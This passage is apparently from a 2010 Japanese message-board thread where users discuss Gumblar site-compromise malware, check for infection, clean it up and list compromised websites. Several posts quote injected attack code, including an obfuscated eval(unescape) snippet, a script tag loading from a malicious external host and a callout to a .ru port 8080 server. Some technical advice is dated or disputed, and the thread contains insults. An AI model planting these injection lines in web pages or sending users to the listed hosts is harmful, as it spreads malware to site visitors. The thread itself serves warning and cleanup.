620 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:31 ID:HJ28nnYh
>>618
ぱくり乙
URLリンク(sound.jp)
自分の意見みたいに言うなよks
621 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:27:47 ID:qRZV9Fiz
>>615
そこ、本当にお前の村かよw
「HOME」付きのSSを晒せよw
622 :名無しさん@お腹いっぱい。:2010/05/11(火) 03:28:48 ID:JReWC+AX
>>620
スペック晒してるから
いつ攻められてもおかしくないだろこれ
625:名無しさん@お腹いっぱい。
10/05/11 04:51:18
なんだこの馬鹿は
626:八頭 ◆YAGApwSaEw
10/05/11 06:32:48
Google危険警告ページ
hatoyamakoji●com
627:名無しさん@お腹いっぱい。
10/05/11 07:53:56
>>626
hatoyamakoji●com [59●106●13●145] www495●sakura●ne●jp
>>7のさくらにつーほーすたー。
628:名無しさん@お腹いっぱい。
10/05/11 14:30:34
>>624
これ踏んでしまった。
何かマズいものあります?
629:名無しさん@お腹いっぱい。
10/05/11 16:20:15
お前の頭かな
630:名無しさん@お腹いっぱい。
10/05/11 16:33:14
>>628
あーあ、やっちゃったね
ご愁傷様
631:名無しさん@お腹いっぱい。
10/05/11 16:58:06
もうこれだけ蔓延してると、踏まないなんて無理だな
632:名無しさん@お腹いっぱい。
10/05/11 17:02:54
>>630
ガンブラーだったんですか?
OSクリーンインストールしないとマズイんでしょうか?
633:名無しさん@お腹いっぱい。
10/05/11 17:16:30
さっさとしろよボケ
634:名無しさん@お腹いっぱい。
10/05/11 17:18:45
>>632
>>633さんもこんなに怒ってるんだぞ
635:名無しさん@お腹いっぱい。
10/05/11 17:21:29
がんぶらぁって感染したら何するの?
ゴチャゴチャ書いてるの読むのメンドいから説明してよ
>>2とか意味わかんないし既存のセキュリティソフトでは何の意味も無いってこと?
636:名無しさん@お腹いっぱい。
10/05/11 17:32:02
感染したら周りに迷惑だから
PCごと捨てちゃえばメンドくなくて簡単だよ!
637:名無しさん@お腹いっぱい。
10/05/11 17:32:28
説明を求めてるのにその回答は無いわー
お前アタマ悪いだろ?
638:名無しさん@お腹いっぱい。
10/05/11 17:35:29
OSクリーンインストールしたくないです(´;ω;`)
本当に感染してしまったんでしょうか
639:名無しさん@お腹いっぱい。
10/05/11 17:35:53
>>637
>>2読んでも理解できなければPC捨てた方がいいじゃない?^^
640:名無しさん@お腹いっぱい。
10/05/11 17:38:32
結局説明出来ないのかよw
テンプレ任せでよく分かってない奴が居着いて煽ってるんじゃ話にならんな
641:名無しさん@お腹いっぱい。
10/05/11 17:43:53
>>572 >>577を見て思ったのですが
ruドメインとcnドメインのアドレスのサイトが危険な傾向にあるというだけで
そのドメインがアドレスに無いロシアのサイトや中国のサイトが危険というわけではないのですね
642:名無しさん@お腹いっぱい。
10/05/11 17:46:11
>>641
日本語で
643:名無しさん@お腹いっぱい。
10/05/11 17:53:44
>>642
ロシアのサイトでもruドメインではないサイトがあるけど
そういう場合は危険なのかという話
644:名無しさん@お腹いっぱい。
10/05/11 17:55:52
>>643
元のドメインがどこかは関係ない
645:名無しさん@お腹いっぱい。
10/05/11 18:07:46
>>638
したくないとかそういう意思の問題じゃないです
とりあえずスキャンしてみればいいじゃない
646:名無しさん@お腹いっぱい。
10/05/11 18:27:00
最近思うんだけど
gumblerに感染してしまった場合
感染の確認方法はあるのでしょうか
また最近のgumblerに感染するとどんな症状が出たりするのでしょうか?
もちろん>>2は怠っていません
647:名無しさん@お腹いっぱい。
10/05/11 18:28:45
もう無理だって踏まないとかは、
だからテンプレにあることしとけばいい
ゼロデイなんて言っても、実際になにか起こる前にはここが狙われそうだから気をつけようとか前段階で話がされるもんだし、その情報に気を配って設定してればおk
648:名無しさん@お腹いっぱい。
10/05/11 18:45:21
マジで返答の半分以上が「PC捨てれば^^」とか「捨てPCで感染すれば分かるんじゃない^^」とか「怖いならクリーンインスコおkおk^^」とかはぐらかしてばかりの奴ばっかりだな……
まぁID出ない上gumblerを自演で意図的にばら撒いてるヘンなのまでいるんだからそういう粘着の類が居てもおかしくは無いのか
649:名無しさん@お腹いっぱい。
10/05/11 18:49:11
>>647
マジで昨日まで大丈夫だったサイトが今日見たらGumbler移ってました、ってのが
ありえるからな……
危機管理の無い「自分だけは大丈夫」って思ってるサイト持ちの奴がどんどん広めてて、
ネットサーフィンする以上避けようがない
もうビクビクするならネット見るな、のレベル
650:名無しさん@お腹いっぱい。
10/05/11 18:49:39
>>647
>>646はそのPCが感染してるかどうかの確認方法を聞きたいんじゃないか?
651:名無しさん@お腹いっぱい。
10/05/11 18:56:02
>>648
信頼できる情報は専門家から金を出して買え
652:名無しさん@お腹いっぱい。
10/05/11 19:01:25
仮想デスクトップで最近のGumblar踏んでくれる人柱はいないのか
653:名無しさん@お腹いっぱい。
10/05/11 19:02:59
>>650
あ、いや別に>>646にレスしたわけじゃない
しかも>>647はほとんど願望、素人のこうであってくれと言う嘆きでしかない
654:名無しさん@お腹いっぱい。
10/05/11 19:09:29
>>652
言い出しっぺの法則
655:名無しさん@お腹いっぱい。
10/05/11 19:46:43
>>646
確認方法はスキャンしてみるって程度
様々なマルウェアをDLするのでそのどれかがスキャンにひっかかるはずという理由
FTP設定ファイルの検索、通信の盗聴、一時期は特定サイトへの攻撃などあったけど
目に見えてわかりやすい症状がでるかというとたぶんない
偽セキュリティソフトのインストールも確実にされるかはわからんしなあ
656:名無しさん@お腹いっぱい。
10/05/11 19:48:26
>>648
何がわからないのかいってくれないと回答しようがないじゃない
質問の大半が「感染したのでしょうか?」なんだから
心配ならOS入れなおせとしか言えないよ
657:名無しさん@お腹いっぱい。
10/05/11 19:51:23
>>655
以前はPC動作が重い、chmファイル改ざんと分かりやすかったのになあ
658:名無しさん@お腹いっぱい。
10/05/11 19:57:05
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
この確認方法も今は通用しないのか
659:名無しさん@お腹いっぱい。
10/05/11 20:04:01
常識的に考えると
HKLMとHKCUの\SOFTWARE\Microsoft\Windows\CurrentVersion\Run辺りで
常駐させてると思うからそこになければ平気な気がするけど
無ければ絶対問題無いといい切れないのが、進化し続けるウィルス
660:名無しさん@お腹いっぱい。
10/05/11 20:19:26
>>646
gumblerに感染したかの確認って言ってるけどgumblerで入ってくるマルウェアは一種類じゃないし
改竄されたサイトに>>2を怠って接続したりしたら勝手にマルウェアをダウンロードされてインストール
されるってこと
入ってくるマルウェアがダウンローダー系だったら色んなワームやら偽セキュリティーソフトがダウンロードされるわけだし
ウイルス対策ソフト入れてたって検出されないやつだったらそのまま入ってきてインストールされるしね
確認方法なんて走ってる怪しいProcessの確認とか、レジストリーのrunキーの確認とか今までの既存のウイルスの感染確認しかない
アンチウイルスソフト最新にして>>2をやる以外に対策はない
ネット使ってて絶対に感染しない対策なんてそもそもないし
それでも不安ならRITURNILでも使ってサイト閲覧は全部仮想化してやるとか
ユーザーの了解なく勝手にダウンロードされてインストールされるのがgumblerの怖いところだよねぇ
661:名無しさん@お腹いっぱい。
10/05/11 20:20:59
>>657
重くなるのはスペック次第じゃないかな
今も低スペックなら重くなるかもしれない
>>658
ファイル名なんてすぐ変更できるから意味がないよね
>>659
初期Gumblarはドライバ部分じゃなかったっけ?
662:名無しさん@お腹いっぱい。
10/05/11 20:24:10
UACとか保護モードも通じない?からなあ
QuickTime無しでmp4やmov形式見られる他のプレイヤーもほとんど無いし
663:名無しさん@お腹いっぱい。
10/05/11 20:44:51
QuickTimeプレイヤーなんか使ってる奴いるのか?
alternativeでコーデックだけインストールしてブラウザのプラグインはインストールしないというやり方のほうが
いいと思うのだが
664:名無しさん@お腹いっぱい。
10/05/11 20:57:56
だいたいQuickTimeは攻撃に使われてないだろ
665:名無しさん@お腹いっぱい。
10/05/11 21:00:11
>>663
つかってなくてもアップルさんが入れろっていうから…
666:名無しさん@お腹いっぱい。
10/05/11 21:04:46
>>663
Alternativeのコーデックは他の一部プレイヤーで不都合ありだからなあ
URLリンク(www.katch.ne.jp)
667:名無しさん@お腹いっぱい。
10/05/11 21:20:36
ブラウザにプラグイン的に拡張されるのは全部脆弱性あるとまずいね
Quicktimeは現時点で攻撃目標にされてないだけで、
今後何があるかわからん
668:名無しさん@お腹いっぱい。
10/05/11 21:23:13
そんなおびえる必要なんてねえだろ
病気かよ
669:名無しさん@お腹いっぱい。
10/05/11 22:24:26
Quicktimeは色々行儀悪いから入れないのが普通
movファイルとかまず使わんしmp4はffdshowでも入れておけばいいし
670:名無しさん@お腹いっぱい。
10/05/11 22:27:25
普通とか何様だよ
必要な人もいるんだろ
671:名無しさん@お腹いっぱい。
10/05/11 22:29:52
ガンブラーについてもよく分かってないくせに
偉そうに語るやつが多いな
672:名無しさん@お腹いっぱい。
10/05/11 22:34:24
>>668
>>670
>>671
673:名無しさん@お腹いっぱい。
10/05/11 22:41:03
ちなみにお前のことな
674:名無しさん@お腹いっぱい。
10/05/11 22:44:16
ちなみにお前のことな
675:名無しさん@お腹いっぱい。
10/05/11 22:44:48
でた
馬鹿得意のコピペ
676:名無しさん@お腹いっぱい。
10/05/11 22:48:27
低脳は自分の馬鹿はわからないのかorz
677:名無しさん@お腹いっぱい。
10/05/11 22:57:41
くだらね
678:名無しさん@お腹いっぱい。
10/05/11 22:59:40
必要なら使えばいいだろってことだろ
攻撃にも使われてないのに使うななんていうのはありえねえ
そんこと言ったら何も使えん
679:名無しさん@お腹いっぱい。
10/05/11 23:03:23
>>678
いちゃもんつけて
スレの流れ切ってんのはお前だろすっこんでろw
680:名無しさん@お腹いっぱい。
10/05/11 23:46:35
俺には何人で会話してるのかさえ分からん……
無知でサーセン
681:コテハン ◆8080adndqg
10/05/12 01:15:42
>>662-669
VLC Media Playerはどないだ?
再生可能なやつ↓
MPEG、AVI、ASF、WMV、WMA、MP4、MOV、3GP、OGG、OGM、Annodex、MKV
WAV、DTS、AAC(m4a)、AC3、A52、Raw DV、FLAC、FLV、MIDI、SMF、MXF・・・
682:名無しさん@お腹いっぱい。
10/05/12 01:33:41
>>682
MediaPrayerClassicも仲間に入れてあげてください
683:名無しさん@お腹いっぱい。
10/05/12 01:41:49
また間違えたorz
684:名無しさん@お腹いっぱい。
10/05/12 02:06:12
>>681
> VLC Media Playerはどないだ?
VLCの現行配布バイナリは 0-day 持ち。
Fix済みソースはリリースされてんのに、
なかなかバイナリがでない。
685:名無しさん@お腹いっぱい。
10/05/12 02:12:06
>>684
現行バイナリは1.0.5。fix済みは1.0.6
686:名無しさん@お腹いっぱい。
10/05/12 02:12:48
VLC.は1.0.6待ち
687:名無しさん@お腹いっぱい。
10/05/12 04:46:29
myako●net
>サーバのファイルにスパイウェアを仕掛けられたため
えぇー
688:名無しさん@お腹いっぱい。
10/05/12 05:30:09
メルに>>8送ったんですけどねぇ。。。
689:名無しさん@お腹いっぱい。
10/05/12 10:30:48
VLCがゼロデイ持ちって言ったって、ちょっと検索したけどいつも見てるホームページが改竄されるGumblerほどの脅威は無いんじゃないの?
自分でダウンロードした覚えのないモノ迂闊に開かない限り問題無いと思うんだけどねぇ
そんなホイホイ不審なファイル開くのって山田オルタナにも感染しそうだ
690:名無しさん@お腹いっぱい。
10/05/12 12:21:33
VLCのフォントってどうやれば変えられるんだ?
691:名無しさん@お腹いっぱい。
10/05/12 12:28:32
VLCは何度設定変更しても元に戻るからもう諦めてデフォで使ってる
692:名無しさん@お腹いっぱい。
10/05/12 13:16:18
>>681
俺はSM PLAYERも仲間に入れてね
693:名無しさん@お腹いっぱい。
10/05/12 13:53:28
僕がつこうてる動画プレーヤーの話は余所でやれ
694:名無しさん@お腹いっぱい。
10/05/12 17:02:33
>>687
これひどいな
サイト主のやる気とか関係なく、後始末ぐらいはちゃんとしろよ
>>607の一番上も403にしただけだし、、、
まあこの後ちゃんと対策含めた告知出すのかもしれんが
695:名無しさん@お腹いっぱい。
10/05/12 18:55:06
むしろちゃんと利用者に対して説明したサイトってなくね
JRとか競馬場のとこですら「てめーらで勝手にウィルススキャンして対処して下さいね」としか言ってないし
696:コテハン ◆8080adndqg
10/05/12 19:59:24
【陥落サイトのURL悪用厳禁】
www●fukuyama-flowerlc●com/
pinkhost●web●fc2●com/i/more06/
ところで、myako●netは再開するつもりなのかにゃ?
697:名無しさん@お腹いっぱい。
10/05/12 20:21:26
Shockwave Playerも危険性あり?
698:名無しさん@お腹いっぱい。
10/05/12 21:00:44
myako●net
再開してるね。
>スパイウェアで攻撃されたため全削除しました(><)
>初心者に優しいスクリプトを再度どのくらいまでできるかわかりませんが配布します
>順次再構築していきますので時々覗いてみて下さい
またやられそう
699:名無しさん@お腹いっぱい。
10/05/12 21:39:47
>>697
現時点でGumblarで利用されていないが
今日重大な脆弱性の修正バージョンがリリースされているので
入れてるなら更新した方がいいし、入れてるだけで使ってないなら削除した方がいい
700:名無しさん@お腹いっぱい。
10/05/12 21:54:37
www●kaizenya●net/newevent ←2月から感染したまま
infom●biz/secretdiet
701:名無しさん@お腹いっぱい。
10/05/12 22:20:27
とあるウェブサイトより
<script language=javascript><!-- Yahoo! Counter starts here-->if(typeof(yahoo_counter)!=typeof(1))eval(unescape(' <--省略--> );var yahoo_counter=1;<!-- counter end --></script><!-- counter end--></script>
上記部分だけ抜き出して投げてみた
URLリンク(www.virustotal.com)
702:名無しさん@お腹いっぱい。
10/05/13 02:44:34
>>586です。
あれからウイルス駆除ソフトでチェックをして、見つかったものを削除。
あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。
FTPはレンタルサーバーのものを使っているのでパスはありません。
一応これで安心でしょうか? >>2も対処しました。ご教授お願いします。
703:名無しさん@お腹いっぱい。
10/05/13 03:10:45
www.hipparidako.net/index.html
704:名無しさん@お腹いっぱい。
10/05/13 03:20:47
>>702
スキャンはあくまで目安であり完全に除去できるものではありません
OSの入れなおしをしてください
また同一ネットワーク上にPCがあるならそちらもスキャンしてください
レンタルサーバでもFTPならパスがあるはずだけどそのへんはわかりません
ちなみに以下は意味がないです
> あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。
705:名無しさん@お腹いっぱい。
10/05/13 07:22:15
>>703
rollover.jsにスクリプトを確認
欠けているのでおそらく不発ですが、放置するのもまずいですね…
706:名無しさん@お腹いっぱい。
10/05/13 08:33:19
>>702
パスがないって…anonymousなの?
707:名無しさん@お腹いっぱい。
10/05/13 08:52:38
コンパネ使ってるとかなんじゃないの
708:名無しさん@お腹いっぱい。
10/05/13 09:03:39
>>702
マルウェア専用のダウンローダーが入ってればそんな事しても意味無い
>FTPはレンタルサーバーのものを使っているのでパスはありません。
意味がわかりません
709:コテハン ◆8080adndqg
10/05/13 10:58:53
>>702
■感染パソコンの修復は「OSの再インストール」が近道
URLリンク(www.so-net.ne.jp)
スキャナー走らせまくって「不確実な駆除作業」に時間をかけるより
クリーンインストールのほうが早くて確実なのです。
710:名無しさん@お腹いっぱい。
10/05/13 12:00:37
>>702
>>2は感染する前にやらないと無意味
711:名無しさん@お腹いっぱい。
10/05/13 12:12:07
>>702です
みなさん、ありがとうございます。
ウイルス駆除ソフトで、検知されなかったのでもう大丈夫だと思っていました。
OSの再インストールというのをやったことがないので不安ですが、リカバリディスクは
PCを購入した時に
解説書にあるとおりに「工場出荷時のイメージ」として作ったCDのことだと思いますので、
それで復元できると思います。
やってみます。
712:名無しさん@お腹いっぱい。
10/05/13 12:50:07
リカバリディスクで復元出来ない物は無いだろ
出来ないとしたらPCが物理的に壊れてる
713:名無しさん@お腹いっぱい。
10/05/13 13:02:10
>>711
以下の鶴で検査して異常がなければ無問題だよ。
リカバリする前に試してみ。
オンラインウイルススキャン
URLリンク(www.kaspersky.co.jp)
ウイルス駆除ツール
URLリンク(support.kaspersky.co.jp)
KatesKiller
URLリンク(support.kaspersky.co.jp)
714:コテハン ◆8080adndqg
10/05/13 13:28:52
>>702
サイトに突っ込まれたのはどのタイプかにゃ?
1:<script src=http://~中略~.php ></script>
2:<script>~難読化されたコード~</script><!--英数字の羅列(32文字)-->
3:1・2以外のコード
4:よくわかんない
715:名無しさん@お腹いっぱい
10/05/13 13:42:44
>713
ありがとうございます。やってみます。
>714
1だと思います。
短めのもので、一ページに一行だけ挿入されていました。
ページの削除→再アップロードで消えました。
716:名無しさん@お腹いっぱい。
10/05/13 13:46:09
URLリンク(www.st.ryukoku.ac.jp)
Shockwaveなんて今時使わないだろ
やっぱり要らないプラグイン入ってる奴はアンインストールしとけ
717:名無しさん@お腹いっぱい
10/05/13 13:57:09
>>702
>>714
頻出してすいません。さがしてきました。これです。
<script src=URLリンク(science.webphoto.ir)
></script>
718:名無しさん@お腹いっぱい。
10/05/13 14:07:08
>>717
>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
URLリンク(www.google.com)
URLリンク(safeweb.norton.com)
URLリンク(www.siteadvisor.com)
719:名無しさん@お腹いっぱい。
10/05/13 14:25:29
aguseで調べると「同一サーバ上の他のウェブサイト」という項目があるけど
その調べたサイトが安全でも「同一サーバ上の他のウェブサイト」がひとつでも感染してると
調べたサイトも危険ということになるのか?
720:コテハン ◆8080adndqg
10/05/13 14:40:16
>>717
そりはGumblar(Gumblar.x)だぬ。
>>713でもおkだけど、他の物も入り込んでる可能性が高いから、
リカバリ後に>>2を実行を推奨するのです。
721:名無しさん@お腹いっぱい。
10/05/13 14:41:11
>>719
日本語でおk
722:名無しさん@お腹いっぱい。
10/05/13 15:01:50
>>717
試しに踏んでみたけど何の反応もない。
723:名無しさん@お腹いっぱい
10/05/13 16:09:12
>717
spybot,ccc,>>713の方法で二回スキャンをかけました。
結果はゼロでウイルスは見つかりませんでしたが
念のためにリカバリしようと思います。
詳しい方が多いようなのでもう一つだけお願いします。
windows7を使っています。
outlookのメールをファイルに保存して、ファイルを外部CDへコピーし、
リカバリの後に戻そうと思っています。
その方法がOEと違っていて、参考になるサイトが見つかりません。
(Xp→7の方法や、OEのファイル保存方法がひっかかります)
windows liveで同期をとろうとしましたが、こちらも再インストールしても、うまくいきませんでした。
スレチなのでお叱り承知ですが、win7のメールの再生方法について、ご教授お願いいたします。
あと>>722さん踏ませてしまってごめんなさい。以後気をつけます。
724:名無しさん@お腹いっぱい。
10/05/13 16:14:20
ここはそういうスレちゃうねんで
725:名無しさん@お腹いっぱい。
10/05/13 16:16:12
URLリンク(support.microsoft.com)
URLリンク(www.microsoft.com)
URLリンク(www.atmarkit.co.jp)
726:名無しさん@お腹いっぱい。
10/05/13 16:16:25
>>723
> windows7を使っています。
なら感染してないよ、たぶん。
727:名無しさん@お腹いっぱい。
10/05/13 16:27:30
取扱注意
www●caaac●net
www●ykhsk●net
www●delldell●info
www●nkrc●co●jp
www●nihontouya●com
728:名無しさん@お腹いっぱい。
10/05/13 17:55:03
URLリンク(www.aguse.jp)
>バージョンアップ内容
> * (2010/05/13) 右クリックメニューからaguse / aguse Gatewayを利用するツールを公開しました。(Firefox3, IE8)
729:コテハン ◆8080adndqg
10/05/13 18:05:21
>>727
~\x2e\x70\x68\x70" 復活してたのねorz
【陥落サイトのURL悪用厳禁】
www●uranaiyakata●com/
lecoqsportif-jp●com/
www●tec●ne●jp/
ja-jp●facebook●com/ ←ぁ?
730:名無しさん@お腹いっぱい。
10/05/13 18:05:29
ru、cn、infoときて今度はどうなることやら
先進国はやられてほしくないものだが
731:名無しさん@お腹いっぱい。
10/05/13 18:52:37
だから、coTLDは関係無いっての
732:名無しさん@お腹いっぱい。
10/05/13 18:53:20
×coTLD
↓
○ccTLD
733:名無しさん@お腹いっぱい。
10/05/13 18:53:43
このサイトチェッカー役にたたねー
URLリンク(www.honeywhales.com)
使い方の問題かもしれんが
734:名無しさん@お腹いっぱい。
10/05/13 20:11:28
関係ないが、ブラウザゲームサイトの中には、今でもshockwave player必須の所あるから、
心当たりがある奴はうpデートしといたほうがいい。
入れたの忘れてる可能性あるし、うpデートしにいけば、入ってるかどうかわかるし。
735:名無しさん@お腹いっぱい。
10/05/13 20:24:25
いちおうShockwavePlayerは自動更新機能あり(デフォで有効)。
ただ常駐しているわけではなくShockwave踏んだ時にチェックが走る模様。
736:名無しさん@お腹いっぱい。
10/05/13 20:26:02
>>726
感染したから改竄されたんじゃ。。。>>586,>>702,>>717,>>723
737:名無しさん@お腹いっぱい。
10/05/13 20:34:53
YouTubeやニコニコ動画に会員登録してるPCがGumblarに感染したら
勝手に作品とかアップロードされる?
あとOutlookやGMailに迷惑メールもいっぱい来るのだろうか
738:名無しさん@お腹いっぱい。
10/05/13 20:49:38
>>737
アップロードはない
そういうものじゃない
スパムメールについてはあるかもしれない
739:名無しさん@お腹いっぱい。
10/05/13 20:57:11
>>723
PC初心者さんはサイト運営とかやらんほうがいいよ
スレリンク(pcqa板:68番)
740:名無しさん@お腹いっぱい。
10/05/13 20:59:28
>>738
HP運営してないPCだとFTPじゃなくてサイトとかのID・PW抜かれるのかと思った
ISPからの個人あてメール(請求額等)は削除した方がいいな・・・
741:名無しさん@お腹いっぱい。
10/05/13 21:06:27
>>740
ネットワーク上の盗聴はしてるからそういうものは抜かれるよ
下の行についてはどういう意味でそれをするのかよくわからないけどお好みでどうぞ
742:名無しさん@お腹いっぱい。
10/05/14 07:02:29
亀かもしれんが
WordPressとかJoomlaとかそういうCMS使ってる?
それなら>>717は多分
URLリンク(blog.sucuri.net)
とか
URLリンク(www.wpsecuritylock.com)
そんな感じじゃないかな。
多分本人のPCに問題は無いと思う。多分だけど。
743:名無しさん@お腹いっぱい。
10/05/14 07:38:25
URLリンク(mobile-apoint.1047.jp)
このサイト、覗くとウイルスに感染するサイトですかね?
確認できる人おねがいします・・・
怖いのでURLの頭2つ消してます。
覗いてから、タスクマネージャが常に100%になって重すぎ状態に・・
744:名無しさん@お腹いっぱい。
10/05/14 07:44:16
URLリンク(www)●hsrc●co●kr
745:名無しさん@お腹いっぱい。
10/05/14 07:44:44
>>743
死ね
746:名無しさん@お腹いっぱい。
10/05/14 09:08:21
これだけ蔓延しているってことは逆に言えば
チェッカーサイトももっと改ざんを検出してくれるような有用なものが
もう2つか3つくらい出来てもいいのにと思う
そうすれば陥落サイトをここで警告できるのだが
747:名無しさん@お腹いっぱい。
10/05/14 09:34:11
ここは鑑定依頼スレではありません
あと専ブラによってはhttp://でもURLリンクします
危険URLは.を●にしましょう
総括:PC窓から投げ捨てて氏ね
748:名無しさん@お腹いっぱい。
10/05/14 11:23:16
どうしてそんなに千人とか万人の内のふたり三人に構うの?
749:名無しさん@お腹いっぱい。
10/05/14 11:26:02
下から三つなんて義務教育の内でも捨てられる階層だよね?
不思議で不思議でしょうがない
750:名無しさん@お腹いっぱい。
10/05/14 11:33:08
切り捨てようよ
本当につまらないんだよ
751:名無しさん@お腹いっぱい。
10/05/14 12:57:52
Windows Home Server その8
スレリンク(win板)
ここによればホームサーバのウィルス対策は個人の自由だそーな
752:名無しさん@お腹いっぱい。
10/05/14 13:31:53
>>746
そう思うなら作ればいいじゃない
753:名無しさん@お腹いっぱい。
10/05/14 13:32:28
>>742
だね・・・。
>>723は鵜呑みにしてリカバリしてしまったんだろうな(‐人‐)
754:名無しさん@お腹いっぱい。
10/05/14 13:48:42
CMS使えるレベルじゃないと思う
755:コテハン ◆8080adndqg
10/05/14 14:52:48
【陥落サイトのURL悪用厳禁】
www●netshikoku●com/n-sekisho/ ←絶賛放置中
※fuukei/niitaka/index.htmとか・・・
www●seibidou●jp/products/information_sign/index●html ←ここも絶賛放置中
途中で切れてるけど・・・いちおう
www●contiforce●com/
fourlcp●com/
756:名無しさん@お腹いっぱい。
10/05/14 17:22:47
たこ焼き注意
www●hipparidako●net
757:名無しさん@お腹いっぱい。
10/05/14 18:19:58
Internet Explorerが毎回「Active Xコントロールやプラグインなどの
ソフトウェアを実行できるようにしますか」と聞いてくるのですが
>>2に従い(1)~(4)の設定をしてからのように思うのです
ある画面では7回位連続して確認を取りにきます
これをしなくていいようにするにはどうすればいいのでしょうか
皆さん頻繁にOKのクリックをしておられるのですか?
758:名無しさん@お腹いっぱい。
10/05/14 18:41:55
URLリンク(www.google.co.jp)
759:名無しさん@お腹いっぱい。
10/05/14 18:47:43
>>756
二日前にメル凸した方が居る様で
対応済みとたこが言っていました
んだがしかし、rollover.js
URLリンク(www.virustotal.com)
URLリンク(www.aguse.jp)
[Gumblarの可能性あり]
760:名無しさん@お腹いっぱい。
10/05/14 19:34:04
>>759
Dr.WEBも赤く怒ってました
761:コテハン ◆8080adndqg
10/05/14 19:58:54
>>759
rollover●js
function M(){var・・・
↓
passportblues●ru:8080
762:名無しさん@お腹いっぱい。
10/05/14 20:15:38
>>757
>>2は関係ありません
763:名無しさん@お腹いっぱい。
10/05/14 20:26:04
>>762
そうなんですか…
ありがとうございます
764:名無しさん@お腹いっぱい。
10/05/15 01:38:27
www●fukuyama-flowerlc●com
mysta-hair●com/premium/premium_list/
765:名無しさん@お腹いっぱい。
10/05/15 02:51:29
つうかIEなんぞ使うなといいたい。
766:名無しさん@お腹いっぱい。
10/05/15 03:33:31
なんでだ
767:名無しさん@お腹いっぱい。
10/05/15 06:09:42
めんどくさいから。
768:名無しさん@お腹いっぱい。
10/05/15 10:03:31
ケイダッシュがまたメンテ中。
またやられたのか。
しかも.htaccessのreplaceの設定が適当なのか、オードリーのページに直接行こうとするとアドレスがイミフなことに。
こんな素人以下のカスweb会社ってあるんだなぁ。
769:名無しさん@お腹いっぱい。
10/05/15 11:11:27
>>764の
mysta-hair●com/premium/premium_list/も
会社概要にはホームページ作成とある件
770:名無しさん@お腹いっぱい。
10/05/15 12:19:04
avastってview-source:付けても反応するんだな。
771:名無しさん@お腹いっぱい。
10/05/15 14:07:11
www●jss-ltd●co●jp
www●netshikoku●com/n-sekisho/
www●brand89●com
www●ryu1●co●jp
www●tenkou1●net
772:名無しさん@お腹いっぱい。
10/05/15 18:04:00
逆に問いたい、なぜ感染していないの
スクショ系暴露ウイルスの怖さを認識したのが最近、Gumblarなんてその怖さを始めは理解できず、サイトもってないしあんま関係ないわ、こんな感じだった
やってたことと言えばOSのアプデとFirefox+NoscriptでJavaスクリプト切ってたくらい
が、サイトによっては結構ONにしてきたし
アドオンの方は更新頻度もテキトーだったし、AdobeリーダーなんてJavaスクリプトONで使いまくってたし、
今いろいろな設定して使ってることから考えると怖い、感染してないのが不思議だね
感染してないとは思うけどな
773:名無しさん@お腹いっぱい。
10/05/15 18:31:05
>感染してないのが不思議だね
>感染してないとは思うけどな
>_<
774:名無しさん@お腹いっぱい。
10/05/15 18:35:43
plus1●6●ql●bz
www●arktake●co●jp
www●g-himiko●co●jp
775:名無しさん@お腹いっぱい。
10/05/15 18:47:10
規制の巻き添えはもういやナリよ・・・
www●g-himiko●co●jp
www●arktake●co●jp
www●acl-music●jp
776:名無しさん@お腹いっぱい。
10/05/15 18:48:25
ぎゃーかぶったー
777:名無しさん@お腹いっぱい。
10/05/15 18:52:34
>>773
>< ぺけぽこ
778:名無しさん@お腹いっぱい。
10/05/15 18:56:32
かぶった腹いせDA!
i-walker●jp
anime●len2●net
779:名無しさん@お腹いっぱい。
10/05/15 19:45:08
>>773
majideそう思うわけ?
きちんと調べるわ
780:名無しさん@お腹いっぱい。
10/05/15 19:48:36
>>772
暴露ウィルスはおそらく作者日本人のいたずら
Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
クレジットカードや銀行口座の情報を盗む
ウィルス作者の作成の手腕も全然違うし
性質がそもそも違うので比較しても仕方が無い
781:名無しさん@お腹いっぱい。
10/05/15 19:49:47
途中で作ってて送信しちゃった
>Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
>クレジットカードや銀行口座の情報を盗む
>世界的な凶悪犯罪
782:名無しさん@お腹いっぱい。
10/05/15 20:26:28
つまり暗号されてない通信からいろいろ情報を抜かれるけどメールアカウントとか、
でもそれが目的じゃないから、口座やクレジット情報をPCで扱わない人は大丈夫って話?2次感染は防止しななきゃいかんけど
でももうそろそろウイルスの中身解析されたりで、転用がでてきたりするんだろうね
783:名無しさん@お腹いっぱい。
10/05/15 20:33:52
感染するのが怖い人はlyumo bookを使おう
784:名無しさん@お腹いっぱい。
10/05/15 20:38:55
結論
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
|
____.____ | .__
| | | | |\_\
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
785:名無しさん@お腹いっぱい。
10/05/15 20:45:52
LiveCDで十分ですよ
786:名無しさん@お腹いっぱい。
10/05/15 20:54:42
ここは、これからもPCを使っていく人が、ウイルスの怖さを正しく認識し運用して行くスレ。
わかってない奴がいるのが訳わからん
787:名無しさん@お腹いっぱい。
10/05/15 22:08:05
>>782
メールアカウントはスパム送信に利用されます
ブログアカウントもコメントスパムに利用したり
それぞれ需要はあるのです
788:名無しさん@お腹いっぱい。
10/05/15 23:18:31
>>786
ここは、これからもWindowsを使っていく人が、ウイルスの怖さを正しく認識し運用して行くスレ。
わかってない奴がいるのが訳わからん
789:名無しさん@お腹いっぱい。
10/05/15 23:46:29
> www●acl-music●jp
これもガンブラーなの?
790:名無しさん@お腹いっぱい。
10/05/15 23:53:01
>>789
>>775
791:名無しさん@お腹いっぱい。
10/05/16 13:29:13
www●g-himiko●co●jp
